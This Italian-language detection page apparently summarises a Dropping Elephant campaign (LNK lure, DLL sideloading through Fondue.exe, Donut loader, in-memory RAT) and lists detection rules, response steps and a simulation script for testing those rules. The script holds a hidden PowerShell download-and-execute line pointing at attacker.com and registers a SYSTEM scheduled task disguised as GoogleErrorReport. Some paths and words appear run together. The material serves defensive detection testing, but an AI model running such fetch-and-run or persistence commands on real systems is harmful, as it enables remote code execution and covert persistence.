Malware alla Moda: Dentro la Catena di Loader di Dropping Elephant
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Una sofisticata campagna attribuita a Dropping Elephant utilizza documenti esca a tema Cina per distribuire un trojan di accesso remoto aggiornato e residente in memoria. L’intrusione si basa sul caricamento laterale DLL tramite un binario Microsoft legittimo e sul caricatore di shellcode Donut per evitare il rilevamento su disco. Il carico finale utilizza anche metodi avanzati di evasione, tra cui l’appiattimento del flusso di controllo e la ricostruzione delle API in tempo reale.
Indagine
I ricercatori di Rapid7 hanno scoperto la minaccia durante una caccia proattiva che è iniziata con un collegamento Windows dannoso mascherato da documento PDF. La loro indagine ha seguito la catena di carico utile dalla messa in scena iniziale su chinagreenenergy[.]org tramite il caricamento laterale DLL di APPWIZ.cpl all’esecuzione di un RAT in memoria. L’analisi a livello di codice con Diaphora ha confermato una discendenza comune con precedenti campioni di Dropping Elephant nonostante ampi rimaneggiamenti.
Mitigazione
I difensori dovrebbero dare priorità alle rilevazioni comportamentali, come file di collegamento che avviano PowerShell e messa in scena sospetta di carichi utili in C:UsersPublic. È anche importante monitorare i compiti pianificati con nomi insoliti e identificare il caricamento laterale DLL da directory inaspettate. Inoltre, le difese degli endpoint necessitano di visibilità a livello di memoria per rilevare la manomissione con AMSI, WLDP e ETW.
Risposta
Se viene rilevata questa attività, isolare immediatamente i sistemi colpiti per interrompere ulteriori traffici di comando e controllo. Eseguire la forense della memoria per identificare il RAT iniettato e ispezionare i compiti pianificati per la persistenza. Anche i registri di rete dovrebbero essere esaminati per traffico HTTPS non autorizzato verso i domini C2 noti e per qualsiasi segno di esfiltrazione di file.
Flusso di attacco
Rilevamenti
Possibile tentativo di comunicazione dominio di ricerca IP (via dns)
Visualizza
Esecuzione insolita di modifica della pagina di codice (via cmdline)
Visualizza
Attività pianificata sospetta (via audit)
Visualizza
Esecuzione sospetta dal profilo utente pubblico (via process_creation)
Visualizza
Libreria dinamica Vcruntime140 caricata da directory sospetta (via image_load)
Visualizza
File sospetti nel profilo utente pubblico (via file_event)
Visualizza
Rilevamento della Campagna Malware di Dropping Elephant [Connessione di Rete di Windows]
Visualizza
Caricamento DLL Malevolo Laterale via Fondue.exe [Evento File di Windows]
Visualizza
Riconoscimento della Campagna Malware Dropping Elephant via Collegamento e Caricamento Laterale [Creazione Processo di Windows]
Visualizza
Esecuzione di Simulazione
Requisito: La Verifica Pre-volo di Telemetria e Baseline deve essere superata.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVE riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa e Comandi dell’Attacco: L’avversario mira a stabilire la persistenza ed eseguire un downloader. Per bypassare i filtri standard delle email, utilizzano un collegamento denominato
GRES3001.lnkche appare come un PDF. Quando viene cliccato, chiamaconhost.exeper eseguire uno script PowerShell. Contemporaneamente, stabiliscono la persistenza creando un compito pianificato chiamatoGoogleErrorReportche è progettato per eseguireFondue.exeda una directory pubblica, mascherandosi come un legittimo reporter di errori di Google per evitare ispezioni casuali. -
Script di Test di Regressione:
# 1. Simulare il comportamento di Scorciatoia/Conhost # Simuliamo l'esecuzione di conhost.exe con la stringa specifica nella riga di comando Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Nota: Per rispecchiare strettamente 'CommandLine contains GRES3001.lnk' della regola, simuliamo la chiamata del processo come se provenisse da quel file. # Poiché non possiamo facilmente falsificare il nome del processo padre in uno script semplice, simuliamo la stringa di riga di comando prevista. Write-Host "[!] Simulazione di attivazione di GRES3001.lnk..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Caricato'" # In un ambiente reale, il campo 'CommandLine' in Sysmon conterrebbe la stringa di destinazione. # 2. Simulare il Compito Pianificato e Fondue.exe caricamento laterale Write-Host "[!] Simulazione del compito pianificato GoogleErrorReport..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Compito Dropping Elephant Simulato" -User "SYSTEM" -Force Write-Host "[+] Simulazione Completa. Controlla SIEM per avvisi." -
Comandi di Pulizia:
# Rimuovere il binario di malware fittizio Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Rimuovere il compito pianificato maligno Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Pulizia Completa."